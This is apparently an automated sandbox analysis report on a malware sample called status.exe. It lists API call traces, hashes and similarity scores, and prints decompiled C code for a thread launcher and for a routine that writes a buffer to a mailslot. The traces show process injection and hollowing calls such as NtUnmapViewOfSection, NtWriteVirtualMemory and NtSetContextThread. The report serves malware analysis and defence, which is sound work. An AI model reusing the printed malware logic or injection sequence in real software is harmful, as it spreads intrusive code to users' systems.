    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 63657

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:707D88A25F54B3F8785905F254974BCE
Total matches:35
Initial Analysis Report:Open
Initial sample Analysis ID:63657
Initial sample SHA 256:8A647D2B5F178B35CEBC334CAD30C8D315F3482D8395263A2C84DB68B5510A62
Initial sample name:status.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
